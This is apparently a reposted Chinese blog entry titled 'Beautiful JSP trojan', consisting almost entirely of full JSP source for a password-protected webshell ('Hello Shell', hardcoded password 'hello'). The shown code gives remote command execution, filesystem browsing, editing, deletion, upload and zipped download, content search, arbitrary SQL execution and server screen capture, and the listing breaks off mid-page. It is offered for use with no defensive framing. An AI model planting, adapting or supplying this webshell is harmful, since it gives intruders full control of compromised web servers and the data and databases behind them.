漂亮的JSP木马
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了漂亮的JSP木马相关的知识,希望对你有一定的参考价值。
纯碎手痒,写一个jsp木马。代码如下:
1 <%@ page contentType="text/html; charset=utf-8"%> 2 <%@ page import="java.io.*"%> 3 <%@ page import="java.util.*"%> 4 <%@ page import="java.nio.charset.Charset"%> 5 <%@ page import="java.util.regex.*"%> 6 <%@ page import="java.sql.*"%> 7 <%@ page import="java.util.zip.ZipEntry"%> 8 <%@ page import="java.util.zip.ZipOutputStream"%> 9 <%@ page import="java.text.DecimalFormat"%> 10 <%@ page import="java.net.InetAddress"%> 11 <%@ page import="java.awt.Dimension"%> 12 <%@ page import="java.awt.Toolkit"%> 13 <%@ page import="java.awt.image.BufferedImage"%> 14 <%@ page import="java.awt.Rectangle"%> 15 <%@ page import="java.awt.Robot"%> 16 <%@ page import="javax.imageio.ImageIO"%> 17 <%! 18 /* 19 * Code by Kenn 20 * QQ: 921506 21 */ 22 private String myPassword = "hello"; 23 private String shellName = "Hello Shell"; //title 24 /* 25 * 骷髅标志:\\u2620 星月标志:\\u262a 外星人标志:\\ud83d\\udc7d 26 */ 27 private String loginIcon = "\\u2620"; 28 private int sessionOutTime = 30; //minutes 29 private static String language = "ENG"; //default language: ENG or CHN; 30 private String encodeType = "utf8"; 31 //welcome info of login page 32 public static String welcomeMsg(){ 33 return orChinese("Welcome for coming","你丫又来了"); 34 } 35 36 private enum Operation{Edit,Delete,Rename,Download;} 37 private String curPath; 38 private boolean isDBconnected = false; 39 private Connection conn = null; 40 private Statement dbStatement = null; 41 42 private static Map<String,String> textMap = null; 43 44 static{ 45 initMap(); 46 } 47 48 public static void initMap(){ 49 if (textMap==null){ 50 textMap = new HashMap<String,String>(); 51 textMap.put("Environment", "系统环境"); 52 textMap.put("File Manager", "文件管理"); 53 textMap.put("File Search", "文件搜索"); 54 textMap.put("Command", "命令行"); 55 textMap.put("Database", "数据库"); 56 textMap.put("Screen Capture", "屏幕采集"); 57 textMap.put("Logoff", "退出"); 58 textMap.put("OS", "操作系统"); 59 textMap.put("Computer Name", "计算机名"); 60 textMap.put("Available Processors", "处理器可用核心数"); 61 textMap.put("IP", "IP地址"); 62 textMap.put("System Driver", "系统盘符"); 63 textMap.put("Driver Info", "磁盘信息"); 64 textMap.put("User Name", "用户名"); 65 textMap.put("User DNS Domain", "用户域"); 66 textMap.put("User Domain", "帐户的域名称"); 67 textMap.put("User Profile", "用户目录"); 68 textMap.put("All User Profile", "用户公共目录"); 69 textMap.put("Temp", "用户临时文件目录"); 70 textMap.put("Program Files", "默认程序目录"); 71 textMap.put("AppData", "应用程序数据目录"); 72 textMap.put("System Root", "系统启动目录"); 73 textMap.put("Console", "控制台"); 74 textMap.put("File Executable", "可执行后缀"); 75 textMap.put("My Path", "本程序绝对路径"); 76 textMap.put("User Dir", "当前用户工作目录"); 77 textMap.put("Protocol", "网络协议"); 78 textMap.put("Server Info", "服务器软件版本信息"); 79 textMap.put("JDK Version", "JDK版本"); 80 textMap.put("JDK Home", "JDK安装路径"); 81 textMap.put("JVM Version", "JAVA虚拟机版本"); 82 textMap.put("JVM Name", "JAVA虚拟机名"); 83 textMap.put("Class Path", "JAVA类路径"); 84 textMap.put("Java Library Path", "JAVA载入库搜索路径"); 85 textMap.put("Java tmpdir", "JAVA临时目录"); 86 textMap.put("Compiler", "JIT编译器名"); 87 textMap.put("Java ext dirs", "扩展目录路径"); 88 textMap.put("Remote Addr", "客户机地址"); 89 textMap.put("Remote Host", "客户机器名"); 90 textMap.put("Remote User", "客户机用户名"); 91 textMap.put("Scheme", "请求方式"); 92 textMap.put("Secure", "应用安全套接字层"); 93 textMap.put("Yes", "是"); 94 textMap.put("No", "否"); 95 textMap.put("Edit", "编辑"); 96 textMap.put("Delete", "删除"); 97 textMap.put("Rename", "重命名"); 98 textMap.put("Download", "下载"); 99 textMap.put("File Name", "文件名"); 100 textMap.put("Size", "大小"); 101 textMap.put("Operation", "操作"); 102 textMap.put("GOTO", "跳转"); 103 textMap.put("Home", "家目录"); 104 textMap.put("Select", "选择"); 105 textMap.put("Upload", "上传"); 106 textMap.put("Create File", "创建文件"); 107 textMap.put("Create Folder", "创建文件夹"); 108 textMap.put("Wrong Password","密码错误"); 109 textMap.put("Folder name is null","文件夹名为空"); 110 textMap.put("Content is null","内容为空"); 111 textMap.put("File name is null","文件名为空"); 112 textMap.put("Search from","搜索目录"); 113 textMap.put("Search for file type","文件的后缀名"); 114 textMap.put("Setting","设置"); 115 textMap.put("Search by Name","按名称搜索"); 116 textMap.put("Search by Content","按内容搜索"); 117 textMap.put("Ignore Case","忽略大小写"); 118 textMap.put("Search keyword","关键词"); 119 textMap.put("Search","搜索"); 120 textMap.put("Execute","执行"); 121 textMap.put("Connect","连接"); 122 textMap.put("Disconnect","断开"); 123 textMap.put("Database Type","数据库类型"); 124 textMap.put("Driver","驱动程序"); 125 textMap.put("Host","主机地址"); 126 textMap.put("Port","端口号"); 127 textMap.put("DB Name","数据库名"); 128 textMap.put("Username","用户名"); 129 textMap.put("Password","密码"); 130 textMap.put("SQL","SQL语句"); 131 textMap.put("File is already exist","文件已存在"); 132 textMap.put("Folder is empty","文件夹为空"); 133 textMap.put("Bad command","错误的命令"); 134 textMap.put("Save","保存"); 135 textMap.put("Return Back","返回"); 136 textMap.put("is not a text file","不是文本文件"); 137 textMap.put("File can not be writed","文件不可写"); 138 textMap.put("Save success","保存成功"); 139 textMap.put("Exception","异常"); 140 textMap.put("Folder already exist","文件夹已存在"); 141 textMap.put("File already exist","文件已存在"); 142 textMap.put("File upload success","文件上传成功"); 143 textMap.put("File upload failed","文件上传失败"); 144 textMap.put("connect failed","连接失败"); 145 textMap.put("connect success","连接成功"); 146 textMap.put("Can not connect to database","不能连接到数据库"); 147 textMap.put("Invalid SQL","无效的SQL"); 148 textMap.put("result","结果"); 149 textMap.put("SQL execute failed","SQL执行失败"); 150 textMap.put("SQL execute success","SQL执行成功"); 151 textMap.put("Free, Total","可用,共"); 152 textMap.put("Please input new name","请输入新的名字"); 153 textMap.put("Name can not be null","名字不可为空"); 154 textMap.put("Refresh","刷新"); 155 } 156 } 157 public static String orChinese(String key){ 158 return "CHN".equalsIgnoreCase(language) 159 ? textMap.get(key) 160 : key; 161 } 162 public static String orChinese(String english, String chinese){ 163 textMap.put(english, chinese); 164 return orChinese(english); 165 } 166 public List<File> getFolderList(String path) { 167 List<File> rtnList = new ArrayList<File>(); 168 File file = new File(path); 169 if (file.exists() && file.isDirectory()) { 170 File[] listFiles = file.listFiles(new FileFilter() { 171 public boolean accept(File pathname) { 172 return pathname.isDirectory(); 173 } 174 }); 175 rtnList.addAll(Arrays.asList(listFiles)); 176 } 177 return rtnList; 178 } 179 180 public List<File> getFileList(String path) { 181 List<File> rtnList = new ArrayList<File>(); 182 File file = new File(path); 183 if (file.exists() && file.isDirectory()) { 184 File[] listFiles = file.listFiles(new FileFilter() { 185 public boolean accept(File pathname) { 186 return pathname.isFile(); 187 } 188 }); 189 rtnList.addAll(Arrays.asList(listFiles)); 190 } 191 return rtnList; 192 } 193 194 public class MyFile extends File { 195 196 private String htmlOperation; 197 private String requestUrl; 198 199 public MyFile(String pathname, String requestUrl) { 200 super(pathname); 201 this.requestUrl = requestUrl; 202 } 203 204 public String getHtmlOperation() { 205 return htmlOperation; 206 } 207 208 public void setHtmlOperation(Operation... Opers) { 209 this.htmlOperation = ""; 210 for (Operation o : Opers) { 211 if (o.equals(Operation.Rename)) { 212 String url = requestUrl + "&fsAction=" + o + "&fileName=" + this.getName(); 213 htmlOperation += " <a href=\\"#\\" onclick=\\"rename(‘" + url + "‘,‘" 214 + orChinese("Please input new name") + "‘,‘" + orChinese("Name can not be null") + "‘)\\">" 215 + orChinese(o.toString()) + "</a> "; 216 } else { 217 htmlOperation += " <a href=\\"" + requestUrl + "&fsAction=" + o + "&fileName=" + this.getName() 218 + "\\">" + orChinese(o.toString()) + "</a> "; 219 } 220 } 221 } 222 223 public String getLength() { 224 if (this.isDirectory()) 225 return ""; 226 return getSize(this.length()); 227 } 228 } 229 230 public static String getSize(long size) { 231 DecimalFormat df = new DecimalFormat("0.00"); 232 if (size >> 40 >= 1) 233 return df.format((float) size / 1024 / 1024 / 1024 / 1024) + " TB"; 234 if (size >> 30 >= 1) 235 return df.format((float) size / 1024 / 1024 / 1024) + " GB"; 236 else if (size >> 20 >= 1) 237 return df.format((float) size / 1024 / 1024) + " MB"; 238 else if (size >> 10 >= 1) 239 return df.format((float) size / 1024) + " KB"; 240 else 241 return df.format((float) size) + " B "; 242 } 243 244 public void download(String path, HttpServletResponse response) throws Exception { 245 try { 246 File file = new File(path); 247 String filename = file.getName(); 248 String ext = filename.substring(filename.lastIndexOf(".") + 1).toUpperCase(); 249 InputStream fis = new BufferedInputStream(new FileInputStream(path)); 250 byte[] buffer = new byte[fis.available()]; 251 fis.read(buffer); 252 fis.close(); 253 response.reset(); 254 response.addHeader("Content-Disposition", 255 "attachment;filename=" + new String(filename.getBytes(), "ISO-8859-1")); 256 response.addHeader("Content-Length", "" + file.length()); 257 OutputStream toClient = new BufferedOutputStream(response.getOutputStream()); 258 response.setContentType("application/octet-stream"); 259 toClient.write(buffer); 260 toClient.flush(); 261 toClient.close(); 262 } catch (IOException ex) { 263 throw ex; 264 } 265 } 266 267 public static File createZip(String sourcePath, String zipPath) throws Exception { 268 FileOutputStream fos = null; 269 ZipOutputStream zos = null; 270 try { 271 File zipFile = new File(zipPath); 272 if (zipFile.exists()) { 273 throw new Exception(orChinese("File is already exist") + ": " + zipFile.getName()); 274 } 275 File srcFolder = new File(sourcePath); 276 if (!srcFolder.exists() || srcFolder.listFiles().length == 0) { 277 throw new Exception(orChinese("Folder is empty") + ": " + srcFolder.getName()); 278 } 279 fos = new FileOutputStream(zipPath); 280 zos = new ZipOutputStream(fos); 281 writeZip(new File(sourcePath), "", zos); 282 return zipFile; 283 } catch (Exception e) { 284 throw e; 285 } finally { 286 try { 287 if (zos != null) 288 zos.close(); 289 if (fos != null) 290 fos.close(); 291 } catch (Exception e) { 292 throw e; 293 } 294 } 295 } 296 297 private static void writeZip(File file, String parentPath, ZipOutputStream zos) throws Exception { 298 if (!file.exists()) 299 return; 300 if (file.isDirectory()) { 301 parentPath += file.getName() + File.separator; 302 File[] files = file.listFiles(); 303 for (File f : files) { 304 writeZip(f, parentPath, zos); 305 } 306 } else { 307 FileInputStream fis = null; 308 DataInputStream dis = null; 309 try { 310 fis = new FileInputStream(file); 311 dis = new DataInputStream(new BufferedInputStream(fis)); 312 ZipEntry ze = new ZipEntry(parentPath + file.getName()); 313 zos.putNextEntry(ze); 314 byte[] content = new byte[1024]; 315 int len; 316 while ((len = fis.read(content)) != -1) { 317 zos.write(content, 0, len); 318 zos.flush(); 319 } 320 } catch (Exception e) { 321 throw e; 322 } finally { 323 try { 324 if (dis != null) 325 dis.close(); 326 if (fis != null) 327 fis.close(); 328 } catch (Exception e) { 329 throw e; 330 } 331 } 332 } 333 } 334 335 public String exeCmd(String cmd) { 336 Runtime runtime = Runtime.getRuntime(); 337 Process proc = null; 338 String retStr = ""; 339 InputStreamReader insReader = null; 340 char[] tmpBuffer = new char[1024]; 341 int nRet = 0; 342 343 try { 344 proc = runtime.exec(cmd); 345 insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); 346 347 while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { 348 retStr += new String(tmpBuffer, 0, nRet) + "\\n"; 349 } 350 insReader.close(); 351 retStr = HTMLEncode(retStr); 352 return retStr; 353 } catch (Exception e) { 354 retStr = "<font color=\\"red\\">" + orChinese("Bad command") + ": \\"" + cmd + "\\"</font>"; 355 return retStr; 356 } 357 } 358 359 public String HTMLEncode(String str) { 360 str = str.replaceAll(" ", " "); 361 str = str.replaceAll("<", "<"); 362 str = str.replaceAll(">", ">"); 363 str = str.replaceAll("\\r\\n", "<br>"); 364 return str; 365 } 366 367 public String Unicode2GB(String str) { 368 String sRet = null; 369 if (str == null) 370 return ""; 371 try { 372 sRet = new String(str.getBytes("ISO8859_1"), encodeType); 373 } catch (Exception e) { 374 sRet = str; 375 } 376 377 return sRet; 378 } 379 380 public String pathConvert(String path) { 381 String sRet = path.replace(‘\\\\‘, ‘/‘); 382 File file = new File(path); 383 if (file.getParent() != null) { 384 if (file.isDirectory()) { 385 if (!sRet.endsWith("/")) 386 sRet += "/"; 387 } 388 } else { 389 if (!sRet.endsWith("/")) 390 sRet += "/"; 391 } 392 return sRet; 393 } 394 395 public String searchFile(String path, String content, String subfix, boolean byname, boolean ignoreCase) { 396 List<String> list = new ArrayList<String>(); 397 searchFile(list, path, content, subfix, byname, ignoreCase); 398 StringBuilder sb = new StringBuilder(); 399 for (String line : list) { 400 sb.append(line.replace("\\\\", "/") + "<br>"); 401 } 402 return sb.toString(); 403 } 404 405 private void searchFile(List<String> list, String path, String content, String subfix, boolean byname, 406 boolean ignoreCase) { 407 path = pathConvert(path); 408 File dir = new File(path); 409 if (dir.exists() && dir.isDirectory()) { 410 if (dir.list() != null && dir.list().length > 0) { 411 for (File f : dir.listFiles()) { 412 if (!f.isDirectory()) { 413 String fname = f.getName(); 414 String srcStr = f.getName(); 415 if (containsSubfix(fname, subfix.split(" "))) { 416 if (!byname) { 417 srcStr = readText(f); 418 } 419 if (ignoreCase) { 420 content = content.toUpperCase(); 421 srcStr = srcStr.toUpperCase(); 422 } 423 if (srcStr.contains(content)) { 424 list.add(f.getAbsolutePath()); 425 } 426 } 427 } else { 428 searchFile(list, f.getAbsolutePath(), content, subfix, byname, ignoreCase); 429 } 430 } 431 } 432 } 433 } 434 435 private boolean containsSubfix(String name, String[] subfixs) { 436 boolean rtn = false; 437 if (subfixs == null || subfixs.length == 0) 438 return rtn; 439 for (String ext : subfixs) { 440 if (name.toUpperCase().endsWith(ext.toUpperCase())) { 441 rtn = true; 442 } 443 } 444 return rtn; 445 } 446 447 public static String readText(File file) { 448 StringBuilder sb = new StringBuilder(); 449 BufferedReader reader = null; 450 try { 451 reader = new BufferedReader(new InputStreamReader(new FileInputStream(file), "GB2312")); 452 String str = null; 453 while ((str = reader.readLine()) != null) { 454 sb.append(str); 455 } 456 } catch (Exception e) { 457 e.printStackTrace(); 458 } finally { 459 try { 460 reader.close(); 461 } catch (Exception e) { 462 e.printStackTrace(); 463 } 464 } 465 return sb.toString(); 466 467 } 468 469 public String openFile(String path, String fileName, String curUri) { 470 String sRet = ""; 471 String fileString = null; 472 File curFile = null; 473 path = pathConvert(path); 474 try { 475 fileString = ""; 476 curFile = new File(path, fileName); 477 FileReader fileReader = new FileReader(curFile); 478 char[] chBuffer = new char[1024]; 479 int nRet; 480 while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) { 481 fileString += new String(chBuffer, 0, nRet); 482 } 483 if (fileString != null) { 484 sRet += "<table align=\\"center\\" width=\\"100%\\" cellpadding=\\"2\\" cellspacing=\\"1\\">\\n"; 485 sRet += " <form name=\\"openfile\\" method=\\"post\\" action=\\"" + curUri + "&curPath=" + path 486 + "&fsAction=save" + "\\">\\n"; 487 sRet += " <input type=\\"hidden\\" name=\\"fileName\\" value=\\"" + fileName + "\\" />\\n"; 488 sRet += " <tr>\\n"; 489 sRet += " <td>[<a href=\\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\\">" 490 + orChinese("Return Back") + "</a>]</td>\\n"; 491 sRet += " </tr>\\n"; 492 sRet += " <tr>\\n"; 493 sRet += " <td align=\\"left\\">\\n"; 494 sRet += " <textarea name=\\"fileContent\\" class=\\"trans\\" style=\\"display:block;width:100%\\" rows=\\"32\\" >\\n"; 495 sRet += HTMLEncode(fileString).replace("<br>", "\\r\\n"); 496 sRet += " </textarea>\\n"; 497 sRet += " </td>\\n"; 498 sRet += " </tr>\\n"; 499 sRet += " <tr>\\n"; 500 sRet += " <td align=\\"center\\"><input type=\\"submit\\" class=\\"trans\\" value=\\"" 501 + orChinese("Save") + "\\" /></td>\\n"; 502 sRet += " </tr>\\n"; 503 sRet += " </form>\\n"; 504 sRet += "</table>\\n"; 505 } 506 fileReader.close(); 507 } catch (IOException e) { 508 sRet = "<font color=\\"red\\">\\"" + path + "\\" " + orChinese("is not a text file") + "</font>"; 509 } 510 return sRet; 511 } 512 513 public String saveFile(String path, String fileName, String curUri, String fileContent) { 514 String sRet = ""; 515 File file = null; 516 517 path = pathConvert(path); 518 519 try { 520 file = new File(path, fileName); 521 522 if (!file.canWrite()) { 523 sRet = "<font color=\\"red\\">" + orChinese("File can not be writed") + "</font>"; 524 } else { 525 FileWriter fileWriter = new FileWriter(file); 526 fileWriter.write(fileContent); 527 528 fileWriter.close(); 529 sRet = orChinese("Save success") + "!\\n"; 530 sRet += "<meta http-equiv=\\"refresh\\" content=\\"1;url=" + curUri + "&curPath=" + path 531 + "&fsAction=list\\" />\\n"; 532 } 533 } catch (IOException e) { 534 sRet = "<font color=\\"red\\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>"; 535 } 536 return sRet; 537 } 538 539 public String createFolder(String path, String fileName, String url) { 540 try { 541 File file = new File(path, fileName); 542 if (file.exists()) 543 return orChinese("Folder already exist") + "!"; 544 else 545 file.mkdirs(); 546 } catch (Exception e) { 547 return "<font color=\\"red\\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>"; 548 } 549 return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />"; 550 } 551 552 public String createFile(String path, String fileName, String url) { 553 try { 554 File file = new File(path, fileName); 555 if (file.exists()) 556 return orChinese("File already exist") + "!"; 557 else 558 file.createNewFile(); 559 } catch (Exception e) { 560 return "<font color=\\"red\\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>"; 561 } 562 return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />"; 563 } 564 565 public String deleteFile(String path, String fileName, String url) { 566 File file = new File(path, fileName); 567 if (file.exists()) 568 file.delete(); 569 return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />"; 570 } 571 572 public String download(String path, String fileName, String url, HttpServletResponse response) { 573 String rtnStr = ""; 574 File file = new File(path, fileName); 575 File downFile = null; 576 if (!file.exists()) 577 return null; 578 try { 579 if (file.isDirectory()) { 580 file = createZip(file.getAbsolutePath(), file.getAbsolutePath() + ".zip"); 581 } 582 download(file.getAbsolutePath(), response); 583 } catch (Exception e) { 584 rtnStr = e.getMessage(); 585 } 586 return rtnStr; 587 } 588 589 public String rename(String path, String fileName, String newFile, String url) { 590 File file = new File(path, fileName); 591 File nFile = new File(path, newFile); 592 if (file.exists()) { 593 file.renameTo(nFile); 594 } 595 return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />"; 596 } 597 598 public String uploadFile(ServletRequest request, String path, String curUri) { 599 String sRet = ""; 600 File file = null; 601 InputStream in = null; 602 path = pathConvert(path); 603 try { 604 in = request.getInputStream(); 605 byte[] inBytes = new byte[request.getContentLength()]; 606 int nBytes; 607 int start = 0; 608 int end = 0; 609 int size = 1024; 610 String token = null; 611 String filePath = null; 612 while ((nBytes = in.read(inBytes, start, size)) != -1) { 613 start += nBytes; 614 } 615 in.close(); 616 int i = 0; 617 byte[] seperator; 618 619 while (inBytes[i] != 13) { 620 i++; 621 } 622 seperator = new byte[i]; 623 624 for (i = 0; i < seperator.length; i++) { 625 seperator[i] = inBytes[i]; 626 } 627 String dataHeader = null; 628 i += 3; 629 start = i; 630 while (!(inBytes[i] == 13 && inBytes[i + 2] == 13)) { 631 i++; 632 } 633 end = i - 1; 634 dataHeader = new String(inBytes, start, end - start + 1); 635 token = "filename=\\""; 636 start = dataHeader.indexOf(token) + token.length(); 637 token = "\\""; 638 end = dataHeader.indexOf(token, start) - 1; 639 filePath = dataHeader.substring(start, end + 1); 640 i += 4; 641 start = i; 642 end = inBytes.length - 1 - 2 - seperator.length - 2 - 2; 643 File newFile = new File(path + filePath); 644 newFile.createNewFile(); 645 FileOutputStream out = new FileOutputStream(newFile); 646 out.write(inBytes, start, end - start + 1); 647 out.close(); 648 649 sRet = "<script language=\\"javascript\\">\\n"; 650 sRet += "alert(\\"" + orChinese("File upload success") + "! " + filePath + "\\");\\n"; 651 sRet += "</script>\\n"; 652 } catch (IOException e) { 653 sRet = "<script language=\\"javascript\\">\\n"; 654 sRet += "alert(\\"" + orChinese("File upload failed") + "!\\");\\n"; 655 sRet += "</script>\\n"; 656 } 657 658 sRet += "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + curUri + "&curPath=" + path + "\\" />"; 659 return sRet; 660 } 661 662 public String DBConnect(String url, String username, String password) { 663 String bRet = orChinese("connect failed"); 664 if (url != null) { 665 try { 666 if (username != null && username.trim().length() > 0) { 667 conn = DriverManager.getConnection(url, username, password); 668 } else { 669 conn = DriverManager.getConnection(url); 670 } 671 dbStatement = conn.createStatement(); 672 bRet = orChinese("connect success"); 673 } catch (SQLException e) { 674 bRet = orChinese("connect failed") + ": " + e.getMessage(); 675 } 676 } 677 return bRet; 678 } 679 680 public String DBExecute(String sql) { 681 String sRet = ""; 682 if (sql == null) 683 return "SQL is null"; 684 if (conn == null || dbStatement == null) { 685 sRet = "<font color=\\"red\\">" + orChinese("Can not connect to database") + "</font>"; 686 } else { 687 try { 688 if (sql.length() <= 6) 689 return "<font color=\\"red\\">" + orChinese("Invalid SQL") + "</font>"; 690 if (sql.toLowerCase().substring(0, 6).equals("select")) { 691 ResultSet rs = dbStatement.executeQuery(sql); 692 ResultSetMetaData rsmd = rs.getMetaData(); 693 int colNum = rsmd.getColumnCount(); 694 int colType; 695 696 sRet = orChinese("SQL execute success") + ", " + orChinese("result") + ":<br>\\n"; 697 sRet += "<table align=\\"center\\" border=\\"0\\" cellpadding=\\"2\\" cellspacing=\\"1\\">\\n"; 698 sRet += " <tr>\\n"; 699 for (int i = 1; i <= colNum; i++) { 700 sRet += " <th>" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")</th>\\n"; 701 } 702 sRet += " </tr>\\n"; 703 while (rs.next()) { 704 sRet += " <tr>\\n"; 705 for (int i = 1; i <= colNum; i++) { 706 colType = rsmd.getColumnType(i); 707 708 sRet += " <td>"; 709 switch (colType) { 710 case Types.BIGINT: 711 sRet += rs.getLong(i); 712 break; 713 714 case Types.BIT: 715 sRet += rs.getBoolean(i); 716 break; 717 718 case Types.BOOLEAN: 719 sRet += rs.getBoolean(i); 720 break; 721 722 case Types.CHAR: 723 sRet += rs.getString(i); 724 break; 725 726 case Types.DATE: 727 sRet += rs.getDate(i).toString(); 728 break; 729 730 case Types.DECIMAL: 731 sRet += rs.getDouble(i); 732 break; 733 734 case Types.NUMERIC: 735 sRet += rs.getDouble(i); 736 break; 737 738 case Types.REAL: 739 sRet += rs.getDouble(i); 740 break; 741 742 case Types.DOUBLE: 743 sRet += rs.getDouble(i); 744 break; 745 746 case Types.FLOAT: 747 sRet += rs.getFloat(i); 748 break; 749 750 case Types.INTEGER: 751 sRet += rs.getInt(i); 752 break; 753 754 case Types.TINYINT: 755 sRet += rs.getShort(i); 756 break; 757 758 case Types.VARCHAR: 759 sRet += rs.getString(i); 760 break; 761 762 case Types.TIME: 763 sRet += rs.getTime(i).toString(); 764 break; 765 766 case Types.DATALINK: 767 sRet += rs.getTimestamp(i).toString(); 768 break; 769 } 770 sRet += " </td>\\n"; 771 } 772 sRet += " </tr>\\n"; 773 } 774 sRet += "</table>\\n"; 775 776 rs.close(); 777 } else { 778 if (dbStatement.execute(sql)) { 779 sRet = orChinese("SQL execute success"); 780 } else { 781 sRet = "<font color=\\"red\\">" + orChinese("SQL execute failed") + "</font>"; 782 } 783 } 784 } catch (SQLException e) { 785 sRet = "<font color=\\"red\\">" + orChinese("SQL execute failed") + "</font>"; 786 } 787 } 788 789 return sRet; 790 } 791 792 private void getScreenImg(HttpServletRequest request, HttpServletResponse response) throws Exception { 793 try{ 794 response.reset(); 795 response.setContentType("image/jpg"); 796 ServletOutputStream sos = response.getOutputStream(); 797 response.setHeader("Pragma", "No-cache"); 798 response.setHeader("Cache-Control", "no-cache"); 799 response.setDateHeader("Expires", 0); 800 Dimension dimension = Toolkit.getDefaultToolkit().getScreenSize(); 801 BufferedImage screenshot = (new Robot()) 802 .createScreenCapture(new Rectangle(0, 0, (int) dimension.getWidth(), (int) dimension.getHeight())); 803 ByteArrayOutputStream bos = new ByteArrayOutputStream(); 804 ImageIO.write(screenshot, "jpg", bos); 805 byte[] buf = bos.toByteArray(); 806 response.setContentLength(buf.length); 807 sos.write(buf); 808 bos.close(); 809 sos.close(); 810 }catch(Exception e){ 811 } 812 } 813 814 public String getDriverInfo() { 815 String str = ""; 816 File[] roots = File.listRoots(); 817 for (File file : roots) { 818 str += file.getPath() + " ("; 819 str += getSize(file.getFreeSpace()) + " " + orChinese("Free, Total") + " "; 820 str += getSize(file.getTotalSpace()) + ")<br>"; 821 } 822 return str; 823 }%> 824 825 <html> 826 <head> 827 <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 828 <style> 829 body {font-size: 14px;font-family: 宋 体 ;color: white;background-color: black;text-align: center;padding: 5 5 5 5;} 830 .trans {background: transparent;margin: 1 1 1 1;color: white;} 831 input.textbox {border: black solid 1;font-size: 12px;height: 18px;} 832 textarea {border: black solid 1;} 833 table {border-collapse: collapse;} 834 table.onhover tr:hover{background:red;} 835 td {border: 1px dotted #FFF;height: 18px;} 836 .break-all {word-break: break-all;} 837 .oper {display: inline-block;float: left;width: 130px;border: 1px dotted #FFF;padding: 5px;margin-right: 3px;margin-bottom: 15px;height: 18px;cursor: hand;} 838 .container {position: absolute;margin: 2 2 2 2;top: 68px;width: 95%;} 839 a:link, a:visited {text-decoration: none;color: #FFF;} 840 a:hover {text-decoration: underline;color: #FFF;} 841 842 </style> 843 <script type="text/JavaScript"> 844 var pressKey = function() { 845 if (event.keyCode == 13) { 846 event.returnValue = false; 847 event.cancel = true; 848 loginForm.submit(); 849 } 850 } 851 var redirect = function(action) { 852 var actionOption = document.getElementById(‘actionOption‘); 853 actionOption.value = action; 854 actionForm.submit(); 855 } 856 var createFile = function(url){ 857 var filename = document.getElementById(‘createFileName‘); 858 window.location.href = url + "&fileName=" + filename.value; 859 } 860 var rename = function(url, msg, errormsg){ 861 var result = prompt(msg + ":" ,"") 862 if (result){ 863 window.location.href=url + "&newName=" + result; 864 }else{ 865 alert(errormsg); 866 } 867 } 868 var dbsubmit = function(fsAction){ 869 var form = document.getElementById("sqlform"); 870 form.action += "&fsAction=" + fsAction; 871 document.getElementById("sqlform").submit(); 872 } 873 var languageChanged = function(url , oldurl){ 874 oldurl = oldurl.replace("&","{{and}}").replace("?","{{question}}"); 875 url = url + "&oldurl=" + oldurl; 876 window.location.href = url; 877 } 878 </script> 879 <title><%=shellName %></title> 880 </head> 881 <body> 882 <% 883 session.setMaxInactiveInterval(sessionOutTime * 60); 884 if (request.getParameter("myPassword") == null && session.getAttribute("myPassword") == null) { 885 if (request.getParameter("lang") !=null){ 886 language = request.getParameter("lang"); 887 String oldurl = request.getParameter("oldurl"); 888 String str = "<meta http-equiv=\\"refresh\\" content=\\"0;url="+oldurl+"\\" />"; 889 out.println(str); 890 out.flush(); 891 } 892 %> 893 <font style="font-size: 300px; color: white"><% out.println(loginIcon); %></font> 894 <form name="loginForm"> 895 <font size=4><%=welcomeMsg() %></font><br><br> 896 <input class="textbox" size="30" name="myPassword" type="password" onkeydown="pressKey()" /> 897 </form> 898 <% 899 } else { 900 String password = null; 901 if (session.getAttribute("myPassword") == null) { 902 password = (String) request.getParameter("myPassword"); 903 if (!myPassword.equals(password)) { 904 String rtnStr = "<div align=\\"center\\"><br><br><font color=\\"red\\">"+orChinese("Wrong Password")+"</font></div>"; 905 rtnStr += "<meta http-equiv=\\"refresh\\" content=\\"1;url=" + request.getRequestURL() + "\\" />"; 906 out.println(rtnStr); 907 out.flush(); 908 //out.close(); 909 return; 910 } 911 session.setAttribute("myPassword", password); 912 } else { 913 password = (String) session.getAttribute("myPassword"); 914 } 915 916 String action = null; 917 if (request.getParameter("action") == null) 918 action = "env"; 919 else 920 action = (String) request.getParameter("action"); 921 922 if (action.equals("exit")) { 923 session.removeAttribute("myPassword"); 924 response.sendRedirect(request.getRequestURI()); 925 //out.close(); 926 return; 927 } 928 %> 929 <form name="actionForm"> 930 <input id="actionOption" type="hidden" name="action" value="Environment" /> 931 </form> 932 <div style="margin-left: 2px"> 933 <div class="oper" onclick="redirect(‘env‘)"><%=orChinese("Environment")%></div> 934 <div class="oper" onclick="redirect(‘file‘)" id="file_system"><%=orChinese("File Manager")%></div> 935 <div class="oper" onclick="redirect(‘search‘)"><%=orChinese("File Search")%></div> 936 <div class="oper" onclick="redirect(‘command‘)"><%=orChinese("Command")%></div> 937 <div class="oper" onclick="redirect(‘database‘)"><%=orChinese("Database")%></div> 938 <div class="oper" onclick="redirect(‘screen‘)"><%=orChinese("Screen Capture")%></div> 939 <div class="oper" onclick="redirect(‘exit‘)"><%=orChinese("Logoff")%></div> 940 </div> 941 <% if (action.equals("lang")){ 942 language = request.getParameter("lang"); 943 String oldurl = request.getParameter("oldurl"); 944 if (oldurl!= null){ 945 oldurl = oldurl.replace("{{and}}", "&").replace("{{question}}", "?"); 946 } 947 String sRet = "<meta http-equiv=\\"refresh\\" content=\\"0;url="+oldurl+"\\" />"; 948 %> 949 <div class="container break-all"><%=sRet %></div> 950 <% 951 }else if (action.equals("env")) { 952 %> 953 <table class="container break-all onhover"> 954 <tr> 955 <td 